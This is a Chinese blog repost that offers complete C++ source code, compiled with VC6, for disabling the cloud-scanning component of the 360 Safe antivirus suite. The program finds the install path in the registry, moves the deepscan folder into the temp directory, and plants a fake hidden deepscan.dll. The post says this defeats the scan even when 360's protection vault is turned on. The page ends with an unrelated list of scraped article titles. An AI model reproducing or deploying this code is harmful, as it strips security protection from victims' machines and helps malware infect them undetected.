把下面的代码保存为一个cpp文件,用vc6.0编译即可    

用了一个API函数 MoveFile ,把360云查杀的文件夹移动到temp目录,这样就让云查杀失效了,对开了保险箱的也是有效的    

// ****************************************** fuck360.cpp ***********************************************    

// By:洪流    
#pragma comment(linker, "/OPT:NOWIN98")    
#pragma comment(linker, "/merge:.data=.text")    
#pragma comment(linker, "/merge:.rdata=.text")    
#pragma comment(linker, "/align:0x200")    
#pragma comment(linker, "/subsystem:windows")    
#include <windows.h>    
#include <stdio.h>    
#pragma comment(lib,"MSVCRT.lib")    
#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")    

void Torrent()    
{    
HKEY hKey = NULL;    
DWORD len=MAX_PATH;    
DWORD type=REG_SZ;    
char pBuf[200];    
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360Safe.exe",0,KEY_ALL_ACCESS,&hKey);    
if (RegQueryValueEx(hKey, "Path" , NULL, &type, (unsigned char*)pBuf, &len) == ERROR_SUCCESS)    
{    
char TempPath[200];    
char exe[200];    
char dll[200];    
char exe_1[200];    
char dll_1[200];    
GetTempPath(sizeof(TempPath),TempPath);    
wsprintf(TempPath,"%s\\tmp",TempPath);    
wsprintf(pBuf,"%s\\deepscan",pBuf);    
MoveFile(pBuf,TempPath);    
CreateDirectory(pBuf,NULL);    

wsprintf(exe,"%s\\360deepscan.exe",TempPath);    
wsprintf(dll,"%s\\360wservice.dll",TempPath);    

wsprintf(exe_1,"%s\\360deepscan.exe",pBuf);    
wsprintf(dll_1,"%s\\360wservice.dll",pBuf);    

CopyFile(exe,exe_1,FALSE);    
CopyFile(dll,dll_1,FALSE);    

FILE *file;    
strcat(pBuf,"\\deepscan.dll");    
file=fopen(pBuf,"w");    
char fuck[10];    
wsprintf(fuck,"deepscan");    
fputs(fuck,file);    
fclose(file);    
SetFileAttributes(pBuf, FILE_ATTRIBUTE_HIDDEN);    
}    
RegCloseKey(hKey);    
}    

//    

    

转载于:https://blog.51cto.com/secode/168308

过360云查杀vc++代码相关推荐

  1. //过360云查杀的代码

    /*--------------------------------*/ //过360云查杀的代码 void RaiseToDebugP() { HANDLE hToken; HANDLE hProc ...

  2. 360云查杀接口的使用

    CString Connect360Cloud(CStringA m_md5) {//请求体CStringA strBody;strBody.Format(("--------------- ...

  3. 360安全卫士的云查杀原理介绍[转]

    我有两个感觉:第一个是关于杀毒软件,一个已经做20年的行业,它的核心技术可以说是一直基于收集病毒样本,采集病毒特征,组成病毒库,在每个用户的机器上按图索骥,像通缉令查坏人一样去查杀病毒.现在木马起来之 ...

  4. 360发布云查杀引擎 称比杀毒软件快十倍

    9月15日消息,360安全卫士6.0版今日正式上线,同时启动"云查杀引擎",用户无需升级木马库即可查杀木马.360公司董事长周鸿祎表示,360安全卫士版比杀毒软件内存少80%,速度 ...

  5. 开源网站云查杀方案,搭建自己的云杀毒。

    最近公司的一个客户被勒索病毒攻击了,可悲的是,客户的文件附件太多而且大,没有做双机热备的功能.当客户发现病毒后,还第一时间格式化了服务器.那叫一个惨!!!!!初步分析导致中毒的原因可能有: 1.内网传 ...

  6. 金山毒霸的云查杀很牛X

    金山毒霸的云查杀很牛X 无论安装包大小.资源占用率.查杀率.还是新病毒反应速度(秒级对比),牛X! 听说,金山毒霸2011-增加了免费服务时间!以后是否也会全免费? 既然免费了,就试试吧! 下载链接: ...

  7. [热门]浅谈360主动防御(360提示)、瑞星主动及360实时查杀的免杀技巧

    今天我给大家讲解一下过360主动和瑞星主动的新思路 现在的360很变态,一方面联合360杀毒,360安全卫士,后台收集 数据 进行联合防御策略 根据我的研究,360实时监视你的电脑,如果你的某个文件操 ...

  8. 基于云查杀的PC游戏反外挂

    外挂是游戏公司的克星.针对于不同的游戏,反外挂的策略也是不同的.比如是一款老游戏需要接入反外挂系统的话,驱动技术就不好了,原因很简单,这个时候的老游戏的汇编代码早已被市场上的外挂作者获取到了,各个功能 ...

  9. 护卫神·云查杀系统V4.0-安全检测部分

    感谢使用护卫神·云查杀系统,该软件专门查杀网页木马,完全免费,欢迎大家使用.     护卫神·云查杀系统 下载地址:http://down.huweishen.com/free/HwsKill.zip ...

最新文章

  1. mysql Got error 28 from storage engine
  2. OpenCV-裁剪图片
  3. python网页请求_python用post请求网页
  4. java整合apollo(一)
  5. java 构造方法和析构方法_PHP面向对象程序设计之构造方法和析构方法详解
  6. Morphia - mongodb之ORM框架
  7. js检测弹出窗口拦截程序
  8. 2.导数——线性代数回顾、曲线概念_1
  9. Java-第三章-从键盘输入整数判断是3和5的倍数!
  10. USB 公,母头接口
  11. ISO27001信息安全管理体系认证范围及用处
  12. 上海大华条码称代码_上海大华条码秤的调试方法
  13. linux find查找时间段文件,查找某个时间段的文件和find命令
  14. PHP格式化 插件 vs code
  15. ZooKeeper作为注册中心
  16. LINK : fatal error LNK1104: 无法打开文件“mfc71.lib”的原因又一例
  17. 1 About This Guide
  18. Ceph Cache Tier
  19. 使用python scrapy爬取全国小区信息(包括小区价格,经纬度,面积,户数等),并保存到mysql和excel
  20. SFI立昌SEA方案与应用

热门文章

  1. Mybatis插件better-mybatis-generator的下载与使用
  2. 算法题:求s=a+aa+aaa+aaaa+aa…a的值
  3. 头歌平台Python实训答案——函数调用
  4. 战至终章--22华科计算机专硕上岸经验贴
  5. 数字沙盘虚拟电子沙盘开发教程第9课
  6. 陈力:传智播客古代 珍宝币 泡泡龙游戏开发第十讲:深入理解盒子模型
  7. Arch Linux桌面环境美化(Xfce4)macOS like
  8. android编程任务进度条,Android 进度条 ProgressBar - Android 入门教程
  9. 高斯投影转换(3度带)
  10. 笔记:caffe安装编译,并用ssd gpu训练自己的数据集